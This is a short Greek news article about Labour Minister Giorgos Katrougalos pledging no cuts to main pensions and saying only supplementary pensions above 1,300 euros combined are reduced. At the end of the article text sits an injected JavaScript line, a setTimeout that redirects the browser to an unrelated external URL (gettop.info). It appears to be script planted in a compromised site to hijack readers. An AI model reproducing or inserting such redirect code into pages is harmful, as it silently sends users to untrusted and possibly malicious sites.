Κατρούγκαλος: Δεν θα υπάρξουν μειώσεις στις κύριες συντάξεις

0
5

 

«Ήρθε η ώρα να ξαναγυρίσουμε την Ελλάδα στην κοινωνική Ευρώπη» ανέφερε ο υπουργός Εργασίας Γιώργος Κατρούγκαλος προσερχόμενος σε εκδήλωση της Ευρωπαϊκής Επιτροπής που πραγματοποιείται στο γραφείο του Ευρωπαϊκού Κοινοβουλίου στην Ελλάδα με θέμα «Διαβούλευση για τον ευρωπαϊκό πυλώνα κοινωνικών δικαιωμάτων». Ο υπουργός διαβεβαίωσε ότι δεν θα υπάρξουν μειώσεις στις κύριες συντάξεις, σε δηλώσεις του σε δημοσιογράφους.

Όπως είπε, η προσπάθεια προσαρμογής τελείωσε και από εδώ και πέρα θα μοιραστούν τα οφέλη από την ανάπτυξη. Μεταξύ άλλων ο κ. Κατρούγκαλος σημείωσε ότι όλες οι μειώσεις που γίνονται είναι οι μειώσεις που περιγράφονται αναλυτικά στον ασφαλιστικό νόμο που ψηφίστηκε.

Επανέλαβε ότι δεν μειώνονται οι κύριες συντάξεις, μειώνονται μόνον οι επικουρικές εφόσον το άθροισμα κύριας και επικουρικής σύνταξης είναι πάνω από 1.300 ευρώ. «Εμείς δεν επιβάλαμε οριζόντιες μειώσεις, όπως στον παρελθόν, εφαρμόσαμε απλώς το νέο σύστημα υπολογισμού και στις παλιές συντάξεις» ανέφερε χαρακτηριστικά.

Επίσης ο υπουργός Εργασίας σχολίασε ότι τώρα που αρχίζει να αποκαθίσταται η εμπιστοσύνη στην ελληνική οικονομία, κάποιοι προσπαθούν να καλλιεργήσουν πάλι αυτό το κλίμα της αμφιβολίας.

Δήλωσε, επίσης, ότι «για πρώτη φορά θέσαμε εμείς το ζήτημα της επιστροφής των συλλογικών διαπραγματεύσεων». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here